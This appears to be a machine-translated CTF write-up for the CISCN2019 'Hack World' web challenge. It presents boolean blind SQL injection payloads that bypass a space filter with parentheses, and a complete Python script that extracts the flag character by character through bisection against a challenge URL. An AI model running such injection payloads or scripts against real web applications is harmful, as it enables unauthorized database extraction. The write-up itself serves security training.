[ciscn2019 North China Day2 web1]hack world

[CISCN2019 North China Day2 Web1]Hack World

The opening page gives a prompt , Input id view pages , The parameter here is id 了 .

Input 1,2,3 View page echo

Input 2 The echo

Input 3 The echo

Find input 3 Echo error prompt when , It indicates that there may be Boolean or delayed blind annotation . Then test .

( This question is very muddled , At the beginning, the test delay can be , Later, I found that it was useless and began to test Boolean blind injection )

The source code given by the boss

Bigwig dichotomy

Tests found Space The filtered ,/**/ Can't be used , But you can use () Bypass .

It is no problem to find something that can be bypassed .

# IF(expr,1,2) #  If the expression  expr  The result is True  return  1, Otherwise return to  2;

id=if(length((select(database())))>0,1,2)
#  The echo  Hello, glzjin wants a girlfriend.

id=if(length((select(database())))<0,1,2)
#  The echo  Do you want to be my girlfriend?

Look at the title carefully , It suggests flag The location of .uuid In the table flag Upper flag Field

#  structure payload

## flag The length of 
id=if(length((select(flag)from(flag)))>$0$,1,0)

## flag value 
id=if((ascii(substr((select(flag)from(flag)),$1$,1)))>=$0$,1,0)

## $x$  For the places that need to be modified 

It's constructed payload, First test some payload Can I use , If the test is OK, you can run the script .

I saw some witeup I found that the big guys like dichotomy , Maybe because two points are faster . So I also use traversal and bisection combined blasting flag Length and value .

#!/usr/bin/env python3
# -*- encoding: UTF-8 -*-

import requests
import string
import time


class Sqlinject():
	def __init__(self, url, keyword=None, len=127):
		self._len = len
		self._url = url
		self._keyword = keyword
		self._length = 0
		self._flag = ''

#  Blasting length 
	def getlength(self, name, payload=None):
		self._payload = payload
		for len in range(self._len):
			payload = self._payload % len
			req = requests.post(self._url, data={
    'id': payload})
			if self._keyword in req.text:
				self._length = len
				print('%s_Length = %d.' % (name, self._length))
				break

#  Blast flag
	def getflag(self, payload=None):
		self._payload = payload
		for len in range(1, self._length + 1):
			min = 33
			max = 126
			while (max > min):
				mid = int((min + max + 1) / 2)
				payload = self._payload % (len, mid)
				req = requests.post(self._url, data={
    'id': payload})
				if self._keyword in req.text:
					min = mid
				else:
					max = mid - 1
				time.sleep(0.1)
			self._flag += chr(max)
			print('flag：%s' % self._flag)


if __name__ == '__main__':
	urls = 'http://b4d3e7f9-4bfc-471b-b010-1ae76b609520.node4.buuoj.cn:81/index.php'
	keywords = 'Hello, glzjin wants a girlfriend.'
	strs = string.ascii_letters + string.digits + string.printable
	inject = Sqlinject(urls, keywords)
	
	# getlength(name, payload)  Two parameters   One is to customize the name of the blasting position, which is only used for printing and display , The other is  payload  Use   Wrap in double quotes , except  length  Other methods only need  payload  And the location that needs to be changed 
	inject.getlength("flaglen", "if(length((select(flag)from(flag)))=%d,1,0)")
	inject.getflag("if((ascii(substr((select(flag)from(flag)),%d,1)))>=%d,1,0)")

	
###  Blow up a flag Words   Only need to use  getflag()  That's it , Because I am also learning python  So practice your hands , It's a whole blind note , The data table of the database exploded and was not posted .

Pay attention to the position

Blow up to flag